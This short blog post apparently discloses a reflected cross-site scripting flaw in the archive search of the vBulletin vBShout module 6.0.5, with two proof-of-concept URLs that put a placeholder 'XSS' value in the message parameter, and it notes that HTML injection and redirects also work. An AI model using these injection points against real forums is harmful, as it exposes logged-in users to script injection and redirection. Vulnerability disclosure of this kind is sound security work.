Sunday, March 25, 2012

vBulletin vBShout Module v6.0.5 - Reflected Cross-Site Scripting ( XSS )

The last version of vBShout (6.0.5) suffers from Reflected Cross-Site Scripting , located in Search Archive
 
Update:  Released version 6.0.6,but still vulnerable.

Poc: ( required to be logged )

http://www.site.com/vbshout.php?message=XSS&username=&hours=&from[month]=0&from[day]=&from[year] =0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1
 


http://www.site.com/vbshout.php?message=XSS&s=&do=archive&instanceid=1


 
Note: HTML Injection and Redirect works too!

No comments: